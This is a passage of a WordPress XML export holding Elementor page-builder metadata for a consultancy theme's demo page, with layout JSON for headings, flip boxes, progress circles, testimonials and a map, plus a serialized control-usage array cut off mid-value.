		<wp:meta_value><![CDATA[531]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"db1842d","elType":"section","settings":{"padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"84cfb4a","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"de37b10","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"2519f8f","elType":"column","settings":{"_column_size":50,"_inline_size":42},"elements":[{"id":"10ad2ad","elType":"widget","settings":{"sub":"what we offer","title":"Make Digital Marketing  Work For Your Business","header_size":"h3","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#52C5B6","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"5aeaeb4","elType":"column","settings":{"_column_size":50,"_inline_size":58},"elements":[{"id":"3148f6f","elType":"widget","settings":{"editor":"<p>We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach. Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"87d4f34","elType":"section","settings":{"gap":"extended","structure":"30","layout":"full_width"},"elements":[{"id":"b70b980","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"73c0a87","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box1.jpg","id":533},"number":"01","title":"Client Learning Programs","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"overlay_bg":"#061E2F","title_typography_font_size":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"iflip_box"}],"isInner":true},{"id":"bc54eaf","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2e00231","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box2.jpg","id":534},"number":"02","title":"Partnership Ecosystem","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"overlay_bg":"#061E2F"},"elements":[],"widgetType":"iflip_box"}],"isInner":true},{"id":"36da7a0","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"a72089a","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box3.jpg","id":535},"number":"03","title":"New Business Innovation","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"overlay_bg":"#061E2F"},"elements":[],"widgetType":"iflip_box"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"4c9f589","elType":"section","settings":{"structure":"40","background_background":"classic","background_color":"#F5F5F5","padding":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"23a042a","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"b29ab89","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":false},{"id":"0e7cc6c","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"3eaebc8","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":false},{"id":"a146db1","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"7c66c5a","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":false},{"id":"8a93a84","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"7f8aa51","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":13,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":false}],"isInner":false},{"id":"076fd4b","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-value.jpg","id":540},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"117","right":"0","bottom":"0","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"87682dc","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"cf617aa","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"73","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"695bdb3","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"90b64c6","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"eb959a2","elType":"widget","settings":{"sub":"the language of business","title":"Consultancy That Empowers You","header_size":"h3","align":"center","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"23","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#FFFFFF","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"df732f4","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center","text_color":"#FFFFFF"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"c95075f","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"512e7f1","elType":"section","settings":{"layout":"full_width"},"elements":[{"id":"0b4ba37","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"20a92cd","elType":"widget","settings":{"title_boxes":[{"_id":"228c623","titles":"our philosophy","title_link":"#our-philo"},{"_id":"71b96ee","titles":"our mission","title_link":"#our-mission"},{"titles":"our vision","title_link":"#our-vision","_id":"02bca8a"}],"radius_title":{"unit":"px","top":"3","right":"3","bottom":"0","left":"0","isLinked":false},"title_bg":"#FFFFFF33","title_active_color":"#1B1D21","title_active_bg":"#FFFFFF"},"elements":[],"widgetType":"itabtitle"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"25cec1f","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","padding":{"unit":"px","top":"86","right":"0","bottom":"120","left":"0","isLinked":false},"_element_id":"our-philo","css_classes":"content-tab","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"69079ef","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"e1703a9","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-value.jpg","id":542},"image_size":"full","image_box_shadow_box_shadow_type":"yes","image_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"c7f2f31","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"40","isLinked":false},"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"797598f","elType":"widget","settings":{"title":"Our Philosophy","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"06391c3","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"ae1ab95","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Investment Management","description_text":"We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_family":"Raleway","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","title_typography_font_size":{"unit":"px","size":18,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"6444584","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Private Credit & Equity","description_text":"We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_family":"Raleway","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","title_typography_font_size":{"unit":"px","size":18,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"45d2a82","elType":"widget","settings":{"text":"Explore More "},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"3076906","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","padding":{"unit":"px","top":"86","right":"0","bottom":"120","left":"0","isLinked":false},"_element_id":"our-mission","css_classes":"content-tab","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"d0c38ef","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"0a21f5d","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/our-vision.jpg","id":1029},"image_size":"full","image_box_shadow_box_shadow_type":"yes","image_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"4554b13","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"40","isLinked":false},"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"ebcd194","elType":"widget","settings":{"title":"Our Mission","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0ef6c14","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"6614930","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Investment Management","description_text":"We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_family":"Raleway","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","title_typography_font_size":{"unit":"px","size":18,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"61f0b81","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Private Credit & Equity","description_text":"We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_family":"Raleway","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","title_typography_font_size":{"unit":"px","size":18,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"ed79a7d","elType":"widget","settings":{"text":"Explore More "},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"dd17773","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","padding":{"unit":"px","top":"86","right":"0","bottom":"120","left":"0","isLinked":false},"_element_id":"our-vision","css_classes":"content-tab","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"49ce3f7","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"fc1c0ad","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image2-home1.jpg","id":1026},"image_size":"full","image_box_shadow_box_shadow_type":"yes","image_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"cd3eacf","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"40","isLinked":false},"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"42d9c0e","elType":"widget","settings":{"title":"Our Vision","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2922134","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a7bdb59","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Investment Management","description_text":"We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_family":"Raleway","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","title_typography_font_size":{"unit":"px","size":18,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"d35150b","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Private Credit & Equity","description_text":"We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_family":"Raleway","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","title_typography_font_size":{"unit":"px","size":18,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"9c23cfd","elType":"widget","settings":{"text":"Explore More "},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"0f844d1","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg2-value.jpg","id":549},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"100","right":"0","bottom":"105","left":"0","isLinked":false},"content_position":"bottom","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"fc8acf7","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin":{"unit":"px","top":"0","right":"70","bottom":"0","left":"0","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"f8ca7a4","elType":"widget","settings":{"sub":"main principles","title":"Global Reach with Local  Understanding","header_size":"h3","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"32","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"subtitle_style":"is_line","stitle_color":"#FFFFFF","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"82ac6eb","elType":"widget","settings":{"ot_accs":[{"acc_title":"Exceptional Client Service","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"74a73c1"},{"acc_title":"A Great Team and Winning Culture","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"a8df8eb"},{"acc_title":"A Commitment to Integrity, Fairness","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"dc09f20"}],"bg_title":"#A7A7A733","title_color":"#FFFFFF","bg_content":"#9C3D3D00","title_border":"#FFFFFF33","content_color":"#CCCCCC","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]},"content_typography_typography":"custom","content_typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iaccordions"}],"isInner":false},{"id":"21dc41a","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"e7a0c01","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-5.png","id":2232},"image_size":"full","align_tablet":"left","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-30","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"aebe74e","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg3-value.jpg","id":558},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"117","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"c4c8174","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"e7309f3","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"afeb8de","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"18aa73e","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"fd1dd49","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":32,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#95A2AC","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"cb7d5c6","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"6734af5","elType":"section","settings":{"structure":"30","layout":"full_width"},"elements":[{"id":"31d8a18","elType":"column","settings":{"_column_size":33,"_inline_size":16.60000000000000142108547152020037174224853515625},"elements":[],"isInner":true},{"id":"284c1cf","elType":"column","settings":{"_column_size":33,"_inline_size":66.13200000000000500222085975110530853271484375},"elements":[{"id":"38f0ecc","elType":"widget","settings":{"testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":2580},"tname":"Oliver Simson","tjob":"client of company","_id":"4b608b2"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"Manager","_id":"f2a510a"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"Designer","_id":"2012bf3"}],"arrows":"true","dots":"false","loop":"true","arrow_spacing":{"unit":"px","size":-127,"sizes":[]},"name_typography_typography":"custom","name_typography_font_weight":"400"},"elements":[],"widgetType":"itestimonials2"}],"isInner":true},{"id":"3f45b25","elType":"column","settings":{"_column_size":33,"_inline_size":16.60000000000000142108547152020037174224853515625},"elements":[],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"8a829f1","elType":"section","settings":{"layout":"full_width"},"elements":[{"id":"0a0ed67","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"ae65e25","elType":"widget","settings":{"address":"411 University St, Seattle, USA","height":{"unit":"px","size":400,"sizes":[]},"css_filters_css_filter":"custom","css_filters_saturate":{"unit":"px","size":0,"sizes":[]}},"elements":[],"widgetType":"google_maps"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:14:{s:8:"iheading";a:3:{s:5:"count";i:4;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:4;s:5:"title";i:4;s:11:"header_size";i:4;s:5:"align";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_mobile";i:1;s:8:"_padding";i:3;}}s:5:"style";a:1:{s:13:"style_section";a:9:{s:9:"stitle_bg";i:4;s:27:"title_typography_typography";i:4;s:33:"title_typography_font_size_mobile";i:4;s:28:"stitle_typography_typography";i:4;s:27:"stitle_typography_font_size";i:4;s:12:"stitle_color";i:4;s:29:"stitle_typography_font_weight";i:4;s:11:"title_color";i:2;s:14:"subtitle_style";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:31;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:31;s:19:"_inline_size_tablet";i:17;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:13:"margin_tablet";i:8;s:13:"margin_mobile";i:2;s:6:"margin";i:4;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:5:"style";a:1:{s:13:"section_style";a:2:{s:5:"align";i:1;s:10:"text_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}}}s:7:"section";a:3:{s:5:"count";i:15;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:8;s:16:"content_position";i:5;s:6:"layout";i:7;}s:17:"section_structure";a:1:{s:9:"structure";i:10;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:5:{s:7:"padding";i:11;s:14:"padding_tablet";i:1;s:14:"padding_mobile";i:8;s:11:"_element_id";